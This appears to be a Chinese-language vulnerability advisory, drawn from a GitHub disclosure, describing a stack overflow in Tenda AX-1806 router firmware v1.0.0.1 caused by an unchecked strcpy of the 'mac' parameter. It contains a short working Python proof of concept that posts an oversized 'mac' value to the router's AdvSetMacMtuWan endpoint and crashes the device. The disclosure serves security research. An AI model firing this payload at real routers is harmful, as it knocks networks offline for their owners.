# N/A
## 概述
Tenda AX-1806 v1.0.0.1 设备存在栈溢出漏洞,位于 sub_65B5C 函数的 mac 参数处理过程中。
## 影响版本
Tenda AX-1806 v1.0.0.1
## 细节
攻击者可通过构造恶意请求,利用 sub_65B5C 函数对 mac 参数的处理缺陷触发栈溢出。
## 影响
远程攻击者可导致拒绝服务(DoS)。
是否为 Web 类漏洞: 未知
判断理由:
| # | POC 描述 | 源链接 | 神龙链接 |
|---|
标题: VulnbyCola/Tenda/AX-1806/11/1.md at main · 0-fool/VulnbyCola · GitHub -- 🔗来源链接
标签:
神龙速读:
```md
## Tenda AX-1806 Vulnerability Details
- **Vendor**: Tenda
- **Product**: AX-1806
- **Version**: v1.0.0.1
- **Vulnerability Type**: Stack Overflow
- **Author**: Chuanhao Wan
- **Institution**: Huazhong University of Science and Technology (HUST)
### Vulnerability Cause
In the function `sub_65B5C`, the `mac` value is obtained from user-controlled input via:
```c
v5 = (const char*)sub_295C8(a1, "mac", &unk_1C2CF0);
strcpy(v13, v5);
```
`v13` is a fixed-size stack buffer of 32 bytes (`char v13[32]`), but `strcpy` performs no bounds checking on the source string. If the `mac` parameter is excessively long, it can cause a stack-based buffer overflow, corrupting adjacent stack memory and potentially leading to a Denial of Service condition.
### Proof of Concept (PoC)
1. Boot the firmware using QEMU system or a real machine.
2. Execute the following Python script to trigger the vulnerability:
```python
import requests
url = "http://192.168.20.12/goform/AdvSetMacMtuWan"
mac = "A"*7000
data = {
"mac": mac
}
r = requests.post(url, data=data)
print(r.status_code, r.text)
```
### Result
The target router crashes and cannot provide services correctly and persistently, as shown in the provided screenshots.
暂无评论